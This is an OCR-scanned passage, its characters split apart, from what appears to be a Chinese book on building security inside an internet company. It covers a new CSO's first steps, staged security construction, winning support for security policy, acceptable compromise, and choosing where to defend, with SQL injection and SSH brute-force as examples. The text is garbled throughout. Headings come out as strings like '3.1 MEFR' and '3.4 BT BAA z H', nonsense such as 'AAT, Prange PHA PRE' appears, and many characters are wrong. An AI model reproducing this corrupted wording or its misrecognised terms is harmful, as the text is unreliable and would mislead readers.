较 高 ， 在 这 种 规模 的 公司 ， 不 是 你 的 安全 策略 提 的 正确 就 一 定 会 被 人 接 
受 的 。 团 队 里 还 应 该 有 1~2 个 大 牛 级 人 物 ， 所 以 带 队 人 自己 应 该 是 在 图 
内 有 影响 力 的 人 ， 人 否则 这 些 事 情 实践 起 来 都 很 难 。 








实际 上 当 你 进入 一 个 平台 级 公司 开始 ， 安 全 建设 早已 不 是 一 项 纯 技 
术 的 工作 ， 而 技术 管理 上 的 系统 性 思路 会 影响 整个 安全 团队 的 投入 产 出 
Hie 


Boe ” 甲 方 安全 建设 方法 论 


那些 国际 安全 标准 、 模 型 和 理论 已 经 讲 了 和 干 万 这 ， 方 法 论 的 东西 也 
许 是 好 东西 ， 但 是 一 般 人 可 能 都 没 时 间 去 读 完 ， 有 时 候 也 会 觉得 理论 脱 
离 实 践 ， 所 以 本 章 讲 的 方法 论 部 从 是 实 操 出 发 的 。 





3.1 MEFR 





本 篇 谈 一 下 CSO 上 任 之 初 要 做 些 什么 吧 。 很 多 没 做 过 甲 方 安 全 的 人 
也 许 都 没有 头绪 ， 或 者 你 只 是 接触 甲 方 安全 的 一 个 细 分 领域 而 不 是 全 
狐 ， 也 许 我 说 的 能 为 你 省 点 脑汁 ， 因 为 开始 是 最 难 的 ， 等 过 了 这 个 阶段 
找到 了 感觉 ， 后面 的 路 束 平 坦 了 。 


1. 三 张 表 


上 任 之 初 你 需要 三 张 表 。 第 一 张 表 : 组 织 结构 图 ， 这 些 是 开展 业务 
的 基础 ， 扫 视 一 下 组 织 结构 中 每 一 块 安全 工作 的 干系 人 。 例 如 行政 、 
HR、 财 务 部 门 是 跟 公司 层面 信息 安全 管理 的 全 局 性 制度 的 制定 和 发 布 
相关 的 部 门 ， 内 部 审计 也 跟 其 强 相关 ; 基础 架构 的 运 维 团队 ， 运 维 安全 
相关 的 要 跟 他 们 合作 ; 研发 团队 ， 可 能 在 组 织 结构 中 分 散 于 各 个 事业 
部 、 各 产品 线 ， 不 一 定 叫 研发 ， 但 本 质 都 是 产品 交付 的 团队 ， 应 用 安全 
和 基础 服务 器 软件 安全 相关 的 要 找 他 们 ， 也 是 SDL 实 施 的 主要 对 象 ;， 运 
营 、 市 场 、 客 服 类 职能 他 们 可 能 没有 直接 的 系统 权限 ， 但 是 会 有 一 些 诸 
如 CMS 的 后 合 权限 “被 社工 的 对 象 ) ， 广 告 的 引入 发 布 “ 挂 马 的 
iframe, RE 等 乱七八糟 的 安全 问题 的 关联 者 ， 他 们 也 是 茶 些 重大 安 
全 事件 上 升 到 社会 影 响 的 危机 管理 的 公关 部 门 : 《大 ) 数据 部 门 ， 因 为 
安全 也 要 用 到 大 数据 ， 是 复 用 一 套 技术 架构 还 是 自己 损 ， 这 个 取决 于 每 

















个 公司 的 实际 状况 ， 有 的 自己 搞 ， 有 的 则 复 用 ;产品 部 门 ， 一 些 跟 业 务 
安全 和 风 控 相关 的 安全 建设 要 跟 他 们 合作 ; CXOs: 这 里 泛 指 组 织 中 的 
决策 层 ， 什 么 问题 要 借助 他 们 自己 拿捏 吧 ， 双 刃 剑 。 





第 二 张 表 : 每 一 个 线 上 产品 服务) 和 交付 团队 (包括 其 主要 负责 
AO 的 映射 。 这 张 图 实际 就 是 缩水 版 的 问题 啊 应 流程 ， 是 日 党 安全 问题 
的 窗口 ， 漏 洞 管 理 流程 主要 通过 这 些 渠 道 去 推动 ， 一 个 安全 团队 的 
Leader 通 常 需要 对 应 于 一 个 或 寿 干 产品 的 安全 改进 。 不 过 这 里 也 要 分 一 
下 权重 ， 比 如 支撑 公司 主要 营 收 的 产品 需要 一 个 主力 小 团队 去 负 员 其 
SDL 全 过 程 ， 而 边缘 性 的 产品 一 个 小 团队 可 以 并 发 承接 好 几 个 甚至 10 个 
以 上 的 产品 ， 粒 度 相 对 粗 一 点 过 滤 主 要 的 安全 问题 即 可 。 通 党 这 样 做 符 
合 风 险 管 理 方法 论 ， 但 对 于 深 知 大 公司 病 又 创业 过 的 我 来 说 ， 还 是 稍微 
有 些 补充 的 看 法 ， 很 多 成 长 中 的 业务 ， 出 于 起 步 阶段 ， 没 有 庞大 的 用 户 
群 ， 可 能 得 不 到 公共 职能 部 门 的 有 为 扶持 ， 例 如 运 维 、 安 全 等 ， 明 日 之 
星 的 业务 完全 可 能 被 扼杀 在 摇篮 里 ， 这 种 时 候 对 有 责任 心 的 安全 团队 来 
说 如 何 带 独 VC 的 眼光 选择 性 的 投入 是 一 件 很 有 意思 的 事 。 在 一 个 公司 
里 是 安全 团队 的 话语 权 大 还 是 文 柱 产品 线 的 话语 权 大 ? 当然 是 支柱 产 
品 ， 等 产品 成 长 起 来 了 再 去 补 安全 的 谍 这 种 事后 诸 允 亮 的 事情 谁 都 会 
做 ， 等 业务 成 长 起 来 后 上 自己 都 能 去 建安 全 团队 了 ， 不 一 定 再 需要 公共 安 
全 团队 的 文 持 。 锅 上 添 花 还 是 委 中 送 灵 ， 业 务 团队 的 这 种 感受 最 后 也 会 
反馈 给 安全 团队 。 


























第 三 张 表 : 准确 地 说 应 该 是 第 三 类 ， 包 括 全 网 拓扑 、 各 系统 的 逻辑 
染 构 图 、 物 理 部 和 著 图 、 各 系统 间 的 调用 关系 、 服 务 治理 结构 、 数 据 流 关 
系 等 ， 这 些 图 未 必 一 开始 就 有 现成 的 ， 促 成 业务 团队 交付 或 者 自己 去 调 
研 都 可 以 ， 以 后 的 日 常 工作 都 需要 这 些 基础 材料 。 如 有 果 运 维 有 资产 管理 
也 需要 关注 一 下 。 








2. 历 史 遗 留 问题 





到 了 这 里 你 是 不 是 跃跃欲试 ， 想 马上 建立 完整 的 安全 体系 了 ? 估计 
有 人 恨不得 马上 拿 扫描 需 去 扫 一 过 了 ， 别 急 ， 就 像 那 首 儿 童 歌曲 唱 
的 “ 葡 冤 成 熟 还 早 得 很 啊 ! ”， 你 现在 的 角色 还 是 救火 队长 ， 离 建设 还 
早 ， 这 跟 你 的 能 力 和 视野 没关系 ， 这 是 客观 情况 决定 的 ， 一 个 安全 没有 
大 问题 的 公司 通常 也 不 会 去 找 一 个 安全 负责 人 。 找 安全 人 负责 人 的 公司 意 
味 着 都 有 一 堆 安 全 问题 吸 竺 处理 。 这 里 就 引申 出 一 个 问题 ， 一 般 情况 下 
都 是 出 了 比较 严重 的 安全 问题 才 去 招聘 安全 负责 人 和 建立 专职 的 安全 团 
队 的 ， 就 是 说 这 些 系统 曾经 被 渗透 过 ， 或 现在 正在 被 控制 中 ， 没 有 人 可 
以 确定 哪些 是 干净 的 ， 哪 些 是 有 问题 的 ， 而 你 加 入 的 时 间 点 往往 就 是 安 
全 一 片 空白 还 不 确定 是 不 是 正在 被 人 搞 。 有 人 说 系统 全 部 重 装 ， 那 你 不 
如 直接 跟 老 板 说 全 部 系统 下 线 ， 域 名 注销 ， 关 门 算 了 ， 那 样子 显然 是 行 
不 通 的 ， 所 以 防御 者 不 是 时 时 处 处 都 占 上 风 。 这 个 问题 只 能 灰 度 处 理 ， 
逐步 建立 入 侵 检测 手段 ， 和 尝试 及 现 异 常 行 为 ， 然 后 以 类 似 灰 度 滚动 升级 
的 方式 去 做 一 轮 线 上 系统 的 后 门 排查 。 














3. 初 期 三 件 事 


一 开始 的 安全 不 能 全 线 铺 开 ， 而 是 要 集中 做 好 三 件 事 ， 第 一 件 是 事 
前 的 安全 基线 ， 不 可 能 永远 做 事后 的 救火 队长 ， 所 以 一 定 要 从 源头 尽 可 
能 保证 你 到 位 后 新 上 线 的 系统 是 安全 的 ， 第 二 件 是 建立 事 中 的 监控 的 能 
力 ， 各 种 多 维度 的 入 侵 检 测 ， 做 到 有 针对 性 的 、 及 时 的 救火 第 三 件 是 
做 好 事后 的 应 急 啊 应 能 力 ， 让 应 急 的 时 间 成 本 更 得， 渊源 和 根 因 分 析 的 
能 力 更 强 。 











一 边 熟悉 业务 ， 一 边 当 救 火 队 长 ， 一 边 筹 建 团 队 基 本 就 是 上 任 后 的 
主要 工作 了 。 如 果 团 队 筹建 得 快 ， 这 个 阶段 2~3 个 月 就 可 以 结束 了 ， 但 
以 目前 招聘 相对 难 的 状况 来 看 可 能 需要 4~6 个 月 。 


3.2 ”不同 阶段 的 安全 建设 重点 


1. 战 后 重建 


救火 阶段 过 去 之 后 会 进入 正式 的 安全 建设 期 。 第 一 个 阶段 是 基础 的 
安全 建设 ， 这 一 期 主要 做 生产 网 络 和 办 公 网 络 的 网 络 安全 的 基础 部 分 。 
也 就 是 在 前 面 1.4 节 “不 同 规模 企业 的 安全 管理 ”介绍 的 大 中 型 企业 对 应 的 
那些 需求 (当然 也 包括 中 小 企业 的 那些 。 完 成 的 标志 : 一 方面 是 所 所 
的 那些 点 全 部 窗 盖 到 了 ， 男 一 方面 是 在 实践 上 不 落后 于 公司 的 整体 技术 
步伐 ， 比 如 运 维 侧 在 用 Puppet、SaltStack 之 类 的 工具 实现 了 一 定 程度 的 
目 动 化 运 维 ， 那 你 的 安全 措施 也 不 好 意思 是 纯 手 工 的 对 不 对 ， 如 果 产 品 
团队 交付 已 经 在 用 持续 集成 了 ， 那 你 是 不 是 也 至 少 提供 个 带 扣 上 自动 化 的 
代码 检查 工具 ， 而 不 是 纯 肉 眼 去 Ctrl+F? 这 一 部 分 其 实 是 很 多 人 眼中 甲 
方 安全 的 全 部 内 容 ， 不 过 我 觉得 远 不 能 止 于 此 。 如 果 这 个 场景 切换 到 准 
生态 级 公司 ， 也 许 要 变化 一 下 ， 直 接 癌 全 线 工 具 目 动 化 看 齐 ， 一 开始 惑 
同步 自 研 必要 的 工具 。 





2. 进 阶 





以 上 算是 解决 了 安全 的 温饱 问题 ， 第 二 阶段 就 是 要 问 更 广 的 方 同 拓 
展 。 一 是 广义 的 信息 安全 ， 以 前 是 在 忙于 解决 不 被 黑 而 抽 不 出 身 ， 现 在 


安全 相关 的 事情 都 要 抓 起 来 ， 从 只 对 接 内 部 IT， 运 维和 研发 部 门 扩展 到 
全 公司 ， 跟 安全 相关 的 环节 需要 加 入 必要 的 流程 ， 以 前 下 线 的 硬盘 不 消 
磁 的 现在 要 重视 起 来 了 ， 以 前 雇员 可 以 随意 披露 公司 的 信息 以 后 就 不 可 
以 了 ， 以 前 雇员 离职 的 账号 不 回收 的 现在 开始 不 可 能 了 ， 以 前 DBA 可 以 
给 数据 库 插 条 记录 然后 去 电 商 上 卖 装 备 的 ， 那 种 事 从 此 开始 要 一 刀 切 
肠 ， 诸 如 此 类 的 事情 还 有 很 多 。 其 实 这 个 时 候 你 可 以 把 ISO27001 拿 出 来 
看 看 了 。 二 是 业务 安全 ， 比 如 用 户 数据 的 隐私 保护 ， 之 前 安全 只 是 作为 
保障 而 不 是 一 种 前 台 可 见 的 竞争 力 ， 但 现在 安全 需要 封装 起 来 对 用 户 可 
见 ， 对 产品 竟 争 力 负责 ， 如 果 公 司 已 经 发 展 到 一 个 很 大 的 平台 ， 盗 号 问 
题 都 解决 不 了 的 ， 我 觉得 真 的 需要 考虑 一 下 自己 的 乌 纱 帽 问题 。 这 一 部 
分 对 安全 图 人 士 而 言 可 能 并 不 高 大 上 ， 可 能 没 太 多 值得 拿 出 来 炫 技 的 部 
分 ， 但 是 我 认为 这 些 是 务实 的 安全 负责 人 需要 考虑 的 问题 ， 这 些 属 于 经 
营 管 理 者 视角 下 的 一 揽 子 安全 问题 ， 如 果 这 些 问 题 不 解决 而 去 发 明 
WAF 太 明 HIDS 去 ， 尽 管 可 以 拿 到 安全 圈 来 发 两 篇 文章 炫 瘤 一 下 ， 但 从 
职责 上 看 属于 本 末 倒 置 ， 直 接 影 响 公 司 营 收 的 问题 需要 先 解 决 。 之 所 以 
把 业务 安全 放 在 第 二 阶段 而 不 是 去 优化 安全 基础 架构 是 因为 投入 产 出 的 
边际 成 本 ， 投 在 业务 安全 上 ， 这 一 部 分 产 出 会 比较 直观 ， 对 高 层 来 说 安 
全 从 第 一 阶段 到 第 二 阶段 一 直 是 有 明显 可 见 的 产 出 ， 而 如 果 此 时 选择 去 
优化 基础 安全 能 力 ， 这 种 产 出 受 边际 成 本 递增 的 影响 ， 效 果 会 极其 不 确 
定 ， 而 这 时 候 业 务 安 全 问题 频 发 ， 就 会 被 倒 逼 至 两 难 的 境地 ， 一 则 优化 
基础 安全 的 工作 做 了 一 半 ， 一 则 又 要 考虑 是 否 中 途 转 去 做 点 救火 的 事 





















































情 ， 而 安全 产 出 是 安全 团队 对 公司 高 层 影响 力 的 所 在 ， 只 有 看 到 持续 的 
产 出 才 会 影响 力 增 加 ， 才 会 有 持续 的 投入 ， 尤 其 在 老板 不 是 技术 出 里 的 
公司 ， 他 也 许 很 难 理解 你 去 发 明 WAF 的 价值 ， 他 只 会 问 盗 号 这 么 严重 
怎么 不 解决 。 这 个 问题 从 工程 师 的 视角 和 管理 者 的 视角 得 出 的 结论 可 能 
完全 不 同 ， 安 全 对 高 层 的 影响 力 是 安全 团队 在 公司 内 发 展 壮 大 的 基础 ， 
这 是 很 多 甲 方 安全 团队 之 痛 ， 你 可 以 对 比 一 下 自己 所 在 的 环境 ， 安 全 团 
队 的 负责 人 对 大 方 回 的 把 控 上 是 不 是 做 到 了 可 持续 友 展 ， 好 吧 ， 这 个 问 
题 有 点 尖锐 。 

















3. 优 化 期 


第 三 个 阶段 会 感到 开源 工具 不 足以 文 撑 业 务 规模 ， 进 入 目 研 工具 时 
代 。 其 实 做 攻防 和 研发 安全 产品 完全 是 两 码 事 ， 存 在 巳 大 的 鸿沟 ， 如 果 
拿 做 攻防 的 团队 直接 去 做 安全 工具 开发 ， 恐 怕 挫 折 会 比较 多 ， 即 便 有 些 
研究 员 擅 长 做 底层 的 东西 ， 但 对 于 高 并 发 生产 环境 的 服务 器 工具 而 言 ， 
还 是 有 很 大 的 门槛 。 为 一 方面 做 攻防 和 做 研发 的 思路 也 截然 不 同 ， 此 时 
其 实 是 在 交付 产品 而 不 是 在 树立 安全 机 制 ， 所 以 要 分 拆 团 队 ， 男 外 招 
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4. 对 外 开放 


第 四 个 阶段 ， 安 全 能 力 对 外 开放 ， 成 为 乙方 ， 不 是 所 有 的 甲 方 安全 
团队 都 会 经 历 这 个 阶段 ， 故 而 此 处 不 展开 。 不 过 我 想 最 重要 的 区 别 是 ， 





， 整 休 交 
体 交 付 ，2B 和 2C 的 区 别 ， 线 下 最 后 一 
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3.3 如何 推动 安全 案 略 


这 是 一 个 在 安全 负责 人 的 面试 中 经 名 被 提 及 的 问题 ， 也 是 在 现实 生 
活 中 甲 方 团队 天 天 面 对 的 问题 。 如 果 你 不 是 正巧 在 面试 ， 那 怎么 回答 这 


个 问题 其 实 不 重要 。 
ja 公司 屋面 


首先 ， 推 动 安全 策略 必须 是 在 组 织 中 自 上 而 下 的 ， 先 跟 高 层 达 成 一 
致 ， 形 成 共同 语言 ， 对 安全 建设 要 付出 的 成 本 和 收益 形成 基本 认 知 ， 这 
个 成 本 不 只 是 安全 团队 的 人 力 成 本 和 所 用 的 IDC 资 源 ， 还 包括 安全 建设 
的 管理 成 本 ， 流 程 可 能 会 变 长 ， 发 布 链条 会 比 过 去 更 长 ， 有 些 产品 可 能 
会 停顿 整改 安全 ， 安 全 特性 的 开发 可 能 会 占用 正常 的 功能 迭代 周期 ， 程 
序 员 可 能 会 站 起 来 说 安全 是 束缚 ， 这 些 都 是 需要 跟 各 产品 线 老 大 达成 一 
致 的 ， 他 们 要 认同 做 安全 这 件 事 的 价值 ， 你 也 要 尽 可 能 的 提供 轻便 的 方 
法 不 影响 业务 的 速度 。 在 规模 较 大 的 公司 ， 只 有 自 上 而 下 的 方式 才能 扒 
得 动 ， 如 果 你 反 其 道行 之 ， 那 我 估计 安全 团队 多 半 在 公司 是 没有 地 位 
的 ， 顶 多 也 就 是 在 微 博 或 者 技术 博客 上 有 些 外 在 的 影响 力 。 往 下 攻略 去 
影响 程序 员 和 SA/DBA 的 难度 肯定 比 往 上 攻略 去 影响 CXO/VPs 的 难度 
小 ， 但 如 果 一 开始 就 选择 一 条 好 走 的 路 ， 实 际 对 安全 团队 来 说 是 不 负责 
任 的， 作为 团队 领导 你 必须 直面 困难 ， 否 则 安全 团队 就 只 能 做 些 补 洞 、 











打杂 、 救 火 队长 的 事 。 


2. 战 术 层 面 


在 我 过 去 的 文章 “CSO 的 生存 艺术 ”http://bbs.chinaunix.net/forum.php? 
mod=view-thread&tid=1163970 中 提 到 一 些 因势利导 的 方法 ， 现 在 回头 
看 这 些 方法 固然 值得 一 用 ， 但 也 不 是 最 先 应 该 拿 出 来 的 。 很 多 时 候 我 认 
为 甲 方 安全 团队 思路 受 限 的 地 方 在 于 : 总 是 把 安全 放 在 研发 和 运 维 的 对 
立 面 上 ， 认 为 天 生 就 是 有 冲突 的 。 不 信 回 顾 一 下 开会 时 是 不 是 经 常 有 人 
对 着 研发 和 运 维 说 “你 们 应 该 如 何如 何 .…... 应 该 这 么 做 否则 就 会 被 

.” 诸 如 此 类 的 都 反映 出 意识 形态 中 安全 人 员 觉 得 研发 就 是 脑残 ， 
运 维 就 是 傻 又 。 为 什么 我 之 前 用 了 “合作 ”一 词 ， 其 实 换个 角度 ， 你 真 的 
了 解 开发 和 运 维 吗 ， 是 不 是 找到 个 漏洞 就 心理 高 高 在 上 了 ? 你 是 在 帮助 
他 们 解决 问题 ， 还 是 在 指使 他 们 听 你 行事 ， 如 果 你 是 产品 研发 的 领头 
人 ， 上 听 到 下 面 的 程序 员 对 安全 修改 怨声载道 会 怎么 想 ? 我 的 建议 是 从 现 
在 开始 不 要 再 用 “你 们 ”这 个 词 ， 而 改 用 “我 们 ”， 自 此 之 后 便 会 驱动 你 换 
位 思考 ， 感 同 身 受 ， 真 正成 为 助力 业务 的 伙伴 。 其 实 有 些 问题 处 理 的 
好 ， 真 正 让 人 感到 你 提 的 建议 很 专业 ， 研 发 和 运 维 人 员 不 仅 会 接受 ， 而 
且 会 认为 自己 掌握 了 更 好 的 编码 技能 或 者 安全 配置 技能 而 产生 正 向 的 驱 
动力 。 再 通俗 一 点 ， 如 果 安 全 跟 研 发 的 人 际 关 系 是 好 的 ， 提 什么 建议 都 
能 接受 ， 即 如 果 我 认可 你 这 个 人 ， 那 么 我 也 认可 你 说 的 事 ;， 反 之， 如 果 
人 际 关系 不 好 ， 那 不 管 你 提 的 对 不 对 ， 我 就 是 不 愿意 改 ， 仅 仅 是 迫 于 



































CTO 的 压力 不 得 不 改 ， 但 我 心理 还 是 有 怨气 ， 我 还 是 想 在 代码 里 留 个 彩 
和 保 。 利 用 局 层 的 大 棒 去 驱动 可 能 是 一 种 虱 试 不 爽 的 技巧 ， 但 我 认为 不 是 
ER. 


安全 策略 的 推动 还 依赖 于 安全 建设 的 有 效 性 ， 如 采 大 家 都 看 到 了 安 
全 宋 略 的 成 效 ， 都 认为 是 有 意义 的 ， 那 么 会 文 持 进一步 推动 安全 俩 略 在 
整个 公司 的 窗 冀 京 和 和 窗 盖 维度 ， 有 反之， 如果 大 家 都 觉得 你 只 不 过 是 在 玩 
些 救 火 的 权宜 之 计 ， 心 理 可 能 会 觉得 有 点 疫 共 ， 后 续 上 自然 也 不 会 很 卖力 
帮 你 推 ， 因 为 没有 认同 感 。 所 以 安全 的 影 啊 力 是 不 是 完全 依赖 于 高 层 的 
重视 ， 我 党 得 有 关系 ， 但 也 跟 上 自己 的 表现 有 很 大 的 关系 。CTO 肯 定 要 平 
衡 开 发 、 运 维 、 安 全 三 者 的 关系 ， 不 会 一 直 倾 问 性 为 安全 撑腰 ， 而 运 维 
和 研发 的 头 肯 定 都 是 希望 有 一 个 强 有 力 的 做 安全 的 外 援 。 在 别人 心中 是 
不 是 符合 需求 且 值 得 信赖 这 个 只 有 自己 去 评估 了 。 

















至 于 程序 员 或 励 师 ， 我 姑且 认为 那 是 一 种 实施 层面 的 权宜 之 计 ， 同 
时 反映 出 安全 行业 比较 缺少 既 懂 技术 且 情 商 叉 高 的 人 。 








3.4 BT BAA z H 


1. 业 界 百 态 





在 安全 行业 5 年 以 下 的 新 人 得 到 的 灌输 基本 都 是 “安全 不 可 或 缺 ”， 
老兵 们 可 能 也 有 扣 “ 看 破 红 竺 ”的 味道 ， 和 觉得 高 层 重 不 重视 安全 也 就 那么 
回 事 。 对 乙方 来 说 高 声 呼吁 安全 的 重要 性 哪怕 是 强调 的 有 点 过 头 也 可 以 
理解 ， 因 为 是 赖 以 生存 的 利益 相关 者 ， 靠 它 吃 饭 ， 影 啊 股 价 。 而 对 于 甲 
方 ， 实 际 上 要 分 几 种 ， 第 一 类 认为 安全 压倒 一 切 ， 且 心口 一 致 。 持 有 这 
类 想法 的 实际 又 可 以 细 分 为 两 种 人 ， 第 一 种 对 安全 行业 涉猎 不 深 ， 还 停 
留 在 原始 的 执 念 阶段 ， 第 二 种 人 的 思想 可 以 表达 为 "业务 怎么 样 与 我 无 
天 ， 只 要 不 出 安全 问题 ， 业 务 死 了 都 无 所 谓 ”， 这 两 种 从 表象 上 看 都 属 
于 第 一 类 ， 但 本 质 上 不 同 ， 而 第 二 类 人 口头 唱 安 全 重要 ， 但 心里 还 是 会 
妥协 。 可 见 甲 方 安全 团队 是 形形色色 的 。 


























2. 安 全 的 本 质 


撤 开 上 述 业 界 百 态 ， 先 看 安全 管理 的 本 质 是 什么 ”安全 的 本 质 其 实 
征 风险 管理 ， 绝 对 的 安全 可 能 吗 ， 说 绝对 安全 本 喘 就 是 个 突 话 。 就 像 知 
名 黑客 去 哥 说 的 ， 哪 人 是 Fireeye 这 样 的 公司 也 一 样 会 被 APT， 原 因 是 攻 
防 不 对 等 ， 防 御 者 要 防御 所 有 的 面 ， 而 攻击 者 只 要 攻破 其 中 一 个 面 的 一 





个 点 就 可 以 了 ， 公 司 几 千 人 的 客户 端 行为 不 是 安全 管理 员 能 决定 和 预测 
的 。 在 所 有 的 面 上 重兵 布防 可 不 可 以 ， 理 论 上 可 以 ， 但 实际 绝对 做 不 

到 。 接 近 于 绝对 安全 的 系统 是 什么 样 的 ? 尽 可 能 的 不 提供 服务 ， 提 供 服 
务 也 只 提供 最 单调 的 数据 交互 模型 ， 尽 可 能 少 的 表现 元 素 ， 那 样 的 话 还 
是 互联 网 吗 ， 还 有 用 户 体验 可 言 吗 ? 而 且 安 全 和 成 本 永远 要 追求 一 个 平 
衡 。 假 设 一 个 大 中 型 互联 网 公司 的 安全 建设 成 本 从 0~60 分 需要 1000 万 ， 

60~80 分 需要 2000 万 ，80~90 分 需要 5000 万 ，90~95 分 需要 2 亿 ， 这 种 边际 
成 本 递增 是 很 多 公司 无 法 承受 的 ， 只 能 追求 最 佳 ROI， 虽 然 最 佳 ROI 难 
以 衡量 ， 但 绝 大 多 数 人 不 会 拿 出 收入 的 50% 去 投 安全 建设 。 








3. 受 协 的 原则 








既然 安全 建设 的 本 质 是 以 一 定 的 成 本 追求 最 大 的 安全 防护 效果 ， 那 
- 定 是 会 有 所 受 协 的 。 于 是 反 过 来 括 麻 一 下 那些 说 宁可 业务 死 也 要 做 安 
全 的 观点 的 初衷 是 什么 呢 ， 也 许 你 猜 到 了 ， 怕 担 责任 ! 因为 业务 死 了 安 
全 团队 不 担 贡 任 ， 他 们 可 以 说 “你 看 安全 不 是 没 出 问题 嘛 ! ”这 固然 是 一 
种 保护 自己 的 方法 ， 但 是 从 公司 的 角度 看 这 束 有 竺 两 梭 了 。 我 认为 安全 
本 质 还 是 为 业务 服务 ， 如 果 业 务 死 了 ， 即 使 安全 做 得 再 好 也 没 价 值 ， 更 
准确 一 点 说 ， 安 全 需要 为 业务 量 身 定制 ， 如 果 业 务 要 轻装 上 阵 ， 你 给 他 
重 甲 也 不 行 ， 只 能 罕 防 弹 背 心 。 安 全 做 得 过 于 重度 都 是 不 合适 的 。 相 对 
而 言 第 二 类 人 拥有 更 加 积极 的 心态 ， 坚 持原 则 又 懂得 给 业务 让 路 ， 只 是 
要 把 握 好 分 寸 ， 避 免 目 己 的 好 心 被 人 利用 ， 成 为 安全 问题 不 整改 的 免责 




















窗口 ， 那 样 吏 事与愿违 了 。 


安全 做 得 不 称职 的 表现 ， 除 了 “无 视 业 务 死 活 *”， 还 包括 : 用 户 体 验 
AAT, Prange PHA PRE: 公司 内 部 流程 大 幅 增 加 ， 严 重 影 响 工作 效 
率 ; 限制 太 多 员工 满意 度 严重 下 降 ， 人 员 流 失 ;， 规章 制度 太 多 ， 以 至 于 
公司 文化 显得 不 近 人 情 ..…. 这 些 都 属于 安全 做 过 头 的 表现 。 








有 的 人 出 发 得 太 久 ， 以 至 于 起 了 初衷 是 什么 





那么 哪些 可 以 妥协 ， 哪 些 必 须 坚 守 呢 ? 高 危 漏洞 ， 有 明显 的 利用 场 
景 ， 不 能 妥协 。 重 要 的 安全 特性 ， 比 如 公有 云 中 的 VPC， 底 层 缺 少 一 个 
安全 特性 ， 直 接 会 导致 安全 建设 的 上 层 建筑 失去 了 地基”， 整 个 都 不 牢 
徘 了 ， 这 种 还 是 要 坚持 ， 可 以 不 精致 ， 但 必须 有 。 


对 于 不 痛 不 痒 的 漏洞 ， 以 及 竺 开发 的 安全 功能 ， 如 果 开 发 周期 很 
长 ， 受 众 群体 很 少 ， 使 用 该 功能 的 用 户 比 例 极 少 ， 边 缘 性 产品 ， 只 影 啊 
茶 个 中 间 版 本 到 下 个 版 本 被 其 他 机 制 完 全 取代 了 ， 诸 如 此 类 的 情况 可 以 
考虑 酌情 尼 协 。 当 然 这 还 会 涉及 为 一 个 话题 在 不 同 的 维度 解决 问题 ， 
个 之 后 再 展开 。 


妥协 并 非 退让 ， 而 是 大 局 观 ， 试 想 公 司 业务 没有 竞争 力 时 ， 做 安全 
的 一 样 面临 窘境 ， 无 论 如 何 都 要 看 主 营业 务 的 脸色 ， 与 其 被 动 跟随 不 如 
REETAN. 














最 后 补充 一 点 : 受 协 不 应 该 发 生 在 工程 师 层面 ， 而 是 应 该 在 Leader 
和 安全 负责 人 这 个 层面 。 如 宋 在 安全 工程 师 目 己 提 的 整改 方案 这 个 层面 
上 ， 目 己 主动 开始 妥协 了 ， 那 后 面 很 多 事情 就 没 法 做 了 。 





3.5 选择 在 不 同 的 维度 做 防御 





攻击 的 方法 干 干 万 万 ， 封 堵 同 一 个 安全 风险 的 防御 方法 往往 不 止 一 
种 ， 如 何 选择 性 价 比 最 高 的 手段 是 甲 方 安全 从 业者 需要 权衡 的 。 





1. 技 术 实 现 维度 场景 


在 纵深 防御 的 概念 中 《参考 后 面 的 “技术 篇 ”) 企业 安全 架构 是 层 层 
设防 ， 层 层 过 滤 的 ， 负 见 漏 洞 如 果 要 利用 成 功 需要 突破 几 层 限 制 ， 所 以 
退 一 步 对 防御 者 而 言 有 选择 在 茶 一 层 或 东 儿 层 去 设防 和 封 墙 的 便利 ， 比 
如 SQL 注入 ， 治 本 的 方法 当然 是 代码 写 对 ， 治 标的 方法 WAF 过 滤 ， 中 间 
的 方法 SQL 层 过 滤 ， 从 效果 上 说 治本 的 方法 固然 最 好 ， 但 在 现实 中 总 归 
会 过 到 各 种 各 样 的 问题 而 无 法 全 部 选择 最 安全 的 解 ， 最 后 是 退 而 求 其 
次 ， 还 是 选择 东 一 层 或 者 茶几 层 去 防御 ， 需 要 整体 考 夸 。 比 如 SQL 注入 
如 果 在 HTTP 层 面 去 解决 无 论 是 静态 规则 还 是 机 器 学 习 都 需要 对 抗 HTTP 
编码 的 问题 ， 不 是 解决 这 个 问题 ROI 最 佳 的 点 ， 但 是 在 SQL 层 面 ， 一 切 
SQL 语句 都 是 真实 的 。 现 实生 活 中 唯一 的 问题 只 是 你 能 不 能 在 最 佳 的 点 
上 推动 解决 方案 。 




















2… 一 题 多 解 ” 的 场景 





假如 同一 个 问题 有 >1 种 解决 方案 ， 可 能 会 因 场 景 不 同 而 面临 选择 。 


比如 对 于 SSH 蠕 虫 的 暴力 破解 ， 你 可 以 选择 : 1) 使 用 证 书 ; 2) 选择 外 
部 防火 墙 上 关闭 22 端 口 ， 只 通过 堡垒 机 登录 ; 3) 修改 SSHD 监 听 非 标准 
端口 ，4) 修改 sshd 源 代码 对 源 限 制 ， 只 接受 可 信 的 客户 端 地 址 ; 5) 使 
用 类 似 fail2ban 这 样 的 工具 或 自己 写 shell 脚 本 ， 或 者 所 谓 的 HIPS 的 功 
能 。 乍 一 看 有 的 做 法 比较 小 众 ， 有 的 则 属于 偏执 狂 式 的 。1) ，2) ， 
5) 属于 大 多 数 人 都 认同 的 普遍 的 做 法 ，4) 和 5) 看 上 去 都 比较 小 众 ， 
有 的 人 认为 可 能 不 适合 用 作 生 产 网 络 ， 其 实 要 看 场景 。 对 于 大 型 互联 网 
公司 内 部 自用 而 言 4) 和 5) 其 实 者 成立， 尽管 偏离 了 业界 标准 ， 但 只 
要 在 公司 内 部 的 自治 生态 里 做 到 “一 刃 切 ”就 可 以 ， 业 界 普遍 是 SSHD 跑 
在 22 端 口 ， 你 可 以 让 公司 内 部 的 都 跑 在 50022 端 口 ， 只 要 公司 内 部 的 服 
务 器 全 都 维持 这 个 统一 策略 ， 但 是 这 个 方案 价值 不 大 的 地 方 在 于 这 种 信 
娠 不 对 称 很 容易 被 打破 ， 你 花 了 那么 大 力气 让 运 维 们 都 去 连 50022 端 口 
了 ， 但 攻击 方 很 快 就 能 知道 ， 然 后 努力 就 白费 了 。 而 对 于 开源 软件 的 修 
改 ， 如 果 基 础 架构 研发 比较 强大 ，Linux、Nginx、SSHD、MySQL 这 些 
全 都 可 以 是 改过 的 私房 菜 ， 加 点 有 意义 的 安全 功能 也 未 尝 不 可 。 不 过 中 
小 型 公司 不 需要 考虑 这 一 点 ， 自 研 毕竟 是 有 门槛 和 成 本 的 。 假 如 场景 切 
